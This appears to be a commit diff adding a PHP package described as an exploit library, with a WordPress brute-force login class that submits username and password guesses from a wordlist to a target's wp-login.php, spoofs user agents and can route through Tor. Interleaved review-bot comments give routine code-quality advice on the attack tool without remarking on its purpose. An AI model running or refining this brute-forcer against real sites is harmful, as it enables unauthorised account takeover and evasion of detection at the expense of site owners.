diff --git a/composer.json b/composer.json
new file mode 100644
index 0000000..87eab27
--- /dev/null
+++ b/composer.json
@@ -0,0 +1,33 @@
+{
+ "name": "lenonleite/exploits",
+ "type": "library",
+ "description": "AsZone/Avenger Component - Exploit",
+ "keywords": ["exploit","Local File Download","Brute Force","WordPress","avenger","aszone","hacker","hacking","attack", "attacking"],
+ "homepage": "http://www.lenonleite.com.br",
+ "license": "MIT",
+ "authors": [
+ {
+ "name": "Lenon Leite",
+ "email": "lenonleite@gmail.com.br",
+ "homepage": "http://www.lenonleite.com.br"
+ },
+ {
+ "name": "ASZone",
+ "homepage": "https://www.aszone.com.br"
+ }
+
+ ],
+ "require": {
+ "php": ">=5.3.9",
+ "guzzlehttp/guzzle":"~5.3",
+ "symfony/dom-crawler":"~2.8",
+ "symfony/css-selector":"2.8",
+ "aszone/fakeheaders": "~0.1"
+ },
+ "autoload": {
+ "psr-4": {
+ "Aszone\\Exploits\\": "src/"
+ }
+ },
+ "minimum-stability": "dev"
+}
diff --git a/src/BruteForceWordPress.php b/src/BruteForceWordPress.php
new file mode 100644
index 0000000..a89676b
--- /dev/null
+++ b/src/BruteForceWordPress.php
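Review bot: `"minimum-stability": "dev"` is set without `"prefer-stable": true`, so a root install of this package can resolve each dependency to an unreleased development branch whenever one satisfies the constraint. Adding `"prefer-stable": true` and committing a `composer.lock` would keep installs on tagged releases and make them reproducible. `"symfony/css-selector":"2.8"` is an exact-version constraint while the sibling `symfony/dom-crawler` uses `~2.8`, so that one package cannot pick up later 2.8.x fixes; `"symfony/css-selector": "~2.8"` would match the others. `src/BruteForceWordPress.php` in this same commit calls `v::file()`, which looks like Respect\Validation, yet no such package appears under `require`; confirm where `v` comes from and declare it if so.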
@@ -0,0 +1,122 @@
+commandData = array_merge($this->defaultEnterData(), $commandData);
+ $this->folderDownload = __DIR__."/../../../../results/exploits/wordpress/";
+
+ }
+
+ private function defaultEnterData()
+ {
+ $dataDefault['dork'] = false;
+ $dataDefault['pl'] = false;
+ $dataDefault['tor'] = false;
+ $dataDefault['torl'] = false;
+ $dataDefault['virginProxies'] = false;
+ $dataDefault['proxyOfSites'] = false;
+
+ return $dataDefault;
+ }
+
+ public function sendDataToLoginWordPress($username, $password, $target)
+ {
+ try {
+ $cookie = 'cookie.txt';
+
+ $postdata = 'log='.$username.'&pwd='.$password.'&wp-submit=Log%20In&redirect_to='.$target.'wp-admin/&testcookie=1';
+ $ch = \curl_init();
+ $header = new FakeHeaders();
+ if ($this->isHttps($target)) {
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+ }
+ curl_setopt($ch, CURLOPT_URL, $target.'wp-login.php');
+ curl_setopt($ch, CURLOPT_USERAGENT, $header->getUserAgent()['User-Agent']);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
+ curl_setopt($ch, CURLOPT_REFERER, $target.'wp-admin/');
+ curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
+ curl_setopt($ch, CURLOPT_POST, 1);
+ curl_setopt($ch, CURLOPT_TIMEOUT, 30);
+ curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
+
+ if (!empty($this->tor)) {
+ curl_setopt($ch, CURLOPT_PROXY, $this->tor);
+ curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_VERBOSE, 0);
+ }
+
+ $result['body'] = curl_exec($ch);
+ $result['status'] = curl_getinfo($ch);
+
+ curl_close($ch);
+
+ //Check if only login is https, if is https return method with target correcty
+ if ($this->isHttps($result['status']['url']) and is_null($this->isHttps($target))) {
+ $this->target = $result['status']['url'];
+ $baseUrlHttps = $this->getBaseUrlWordPressByUrl($result['status']['url']);
+ $result = $this->sendDataToLoginWordPress($username, $password, $baseUrlHttps);
+ }
+
+ return $result;
+ } catch (\Exception $e) {
+ echo $e->getMessage();
+ $result['body'] = $e->getMessage();
+ $result['status'] = $e->getCode();
+ exit();
+ }
+
+ return $result;
+ }
+
+ public function getWordListInArray($wordlist = '')
+ {
+ if (empty($wordlist)) {
+
+ $wordlist = __DIR__ . '/resource/litleWordListPt.txt';
+ $arrWordlist = file($wordlist, FILE_IGNORE_NEW_LINES);
+ return $arrWordlist;
+ }
+
+ $checkFileWordList = v::file()->notEmpty()->validate($wordlist);
+ if ($checkFileWordList) {
+ $targetResult = file($wordlist, FILE_IGNORE_NEW_LINES);
+
+ return $targetResult;
+ }
+
+ return false;
+ }
+
+}
\ No newline at end of file
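Review bot: `sendDataToLoginWordPress` switches certificate verification off for every https target (`curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);`), so the credentials in `$postdata` and the response the caller evaluates travel over a connection whose peer is never authenticated. Removing that branch lets libcurl's default verification apply; if an override is really needed it should be an explicit opt-in rather than the default for all https URLs. The relative `$cookie = 'cookie.txt'` writes session cookies into whatever the working directory happens to be and reuses them across runs, where a per-run temporary file deleted after `curl_close($ch)` would not. In the `catch` block, `exit()` terminates the host process from library code and leaves the final `return $result;` unreachable; the curl calls shown signal failure through a `false` return rather than an exception, so that handler is unlikely to run for transport errors, and `curl_exec` returning `false` goes unchecked. The top of the file (namespace, imports, class header, constructor signature) is missing from the hunk as shown, so where `FakeHeaders`, `v` and `isHttps` come from cannot be checked here.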